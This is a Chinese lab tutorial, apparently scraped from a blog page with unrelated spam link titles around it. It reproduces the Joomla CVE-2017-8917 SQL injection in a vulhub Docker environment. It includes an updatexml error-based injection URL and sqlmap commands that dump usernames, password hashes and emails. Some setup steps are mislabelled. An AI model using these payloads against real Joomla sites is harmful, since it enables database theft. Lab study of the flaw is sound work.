当前位置: 首页 > news >正文

深圳汽车网站建设官方网站平台有哪些

深圳汽车网站建设,官方网站平台有哪些,桂林北站官网,网页建立网站平台文章目录 搭建环境启动环境漏洞复现报错注入使用sqlmap 前提条件: 1.安装docker docker pull medicean/vulapps:j_joomla_22.安装docker-compose docker run -d -p 8000:80 medicean/vulapps:j_joomla_23.下载vulhub Docker Compose是 docker 提供的一个命令行工具&…

文章目录

  • 搭建环境
  • 启动环境
  • 漏洞复现
    • 报错注入
    • 使用sqlmap

前提条件:

1.安装docker

docker pull medicean/vulapps:j_joomla_2

2.安装docker-compose

docker run -d -p 8000:80 medicean/vulapps:j_joomla_2

3.下载vulhub

Docker Compose是 docker 提供的一个命令行工具,用来定义和运行由多个容器组成的应用,而docker-compose.yml是它的配置文件。

搭建环境

进入vulhb目录下的joomla,复现CVE-2017-8917漏洞:

cd /home/kali/vulhub/joomla/CVE-2017-8917

查看docker-compose的配置文件:

cat docker-compose.yml

如图,里面有两个镜像文件的信息,还有容器名字:

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

然后使用下面命令,搭建docker-compose并启动:

docker-compose up -d && docker-compose up -d

如图:

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

启动环境

环境搭建成功后,在浏览器中输入本机地址加之前配置文件中的端口10.9.75.45:8080进入Joomla环境:

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

配置网站,输入用户名和密码,密码设为root,点击下一步:

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

配置数据库账户密码,输入之前在配置文件中看到的数据库信息,点击下一步:

用户:root
密码:vulhub
数据库名:joomla

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

成功后点击安装,安装成功后点击删除installation目录(重要)

在这里插入图片描述

漏洞复现

报错注入

环境启动成功后刷新,页面跳转并出现报错信息,这时候可以用SQL注入中的报错注入来获取数据库信息,在URL中输入:

?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)

成功回显当前用户名:

在这里插入图片描述

使用sqlmap

在kali中输入下面命令,获取数据库名,注入点为list:

sqlmap -u "http://10.9.75.45:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x7e,version()),1)" --dbs

在弹出的交互式语句中直接回车,最后爆破出数据库名:
在这里插入图片描述

,输入下面命令,查看Joomla数据库中的表:

sqlmap -u "http://10.9.75.45:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -D joomla --tables

第一个交互选n,第二个直接回车,列出57个表名,其中比较重要的表示users:

在这里插入图片描述

查看users表中的内容:

–dump列表中指定列的内容

sqlmap -u "http://10.9.75.45:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x7e,version()),1)" -D joomla -T '#__users' -C username,password,email --dump 

成功获得了用户名、加密的密码和之前输入的邮箱:

在这里插入图片描述

http://www.yayakq.cn/news/188019/

相关文章:

  • 洛阳做网站公司哪家好商业网站建设设计
  • 大濮网最新濮阳消息新闻类网站怎么做seo
  • 谷歌网站收录提交入口郴州网站建设网络推广平台
  • 介休城乡建设网站wordpress 404插件
  • 网站 可信验证做图骂人的图片网站
  • 山东建设工会网站编程工具
  • 三门峡网站建设电话kfk wordpress
  • 做文案策划需要用到的网站个人网站毕业设计作品
  • 给境外合法网站做数据建设网站出现400错误
  • 常州高端网站制作公司排名网站怎样优化文章关键词
  • ps海报素材网站python配合wordpress
  • 装修网站大全网站系统名称怎么填
  • 郑州网站设计制作微信官网网页版登录入口
  • 做网站的流程百科门户网站怎么建设需要多长时间
  • 建设银行网站无法访问中小企业网络需求分析
  • 有什么做详情页的参考网站谷歌应用商店下载
  • 营销型网站的重要特点珠海网站建设制作哪家专业
  • 大连云建站模板网站运营是什么岗位
  • vue大型网站开发吗购物网站建设咨询
  • 怎么把网站制作成app佛山互联网公司
  • 网站文章页的排名怎么做dw如何在网站做弹窗
  • 学校网站建设价格做网站代理属于开设赌场罪吗
  • 小型网站建设公司价格低大连万词推广
  • 国外最火的网站林州网站建设价格
  • 郑州高端网站百度沈阳分公司地址在哪里
  • 织梦网站首页模板更换如何查公司的工商注册信息
  • 做网站的价钱公关公司网站
  • 南阳网站建设培训推广优化
  • 集团网站建设网络公司页面排版
  • ftp是属于一种网站发布方式站长工具官网域名查询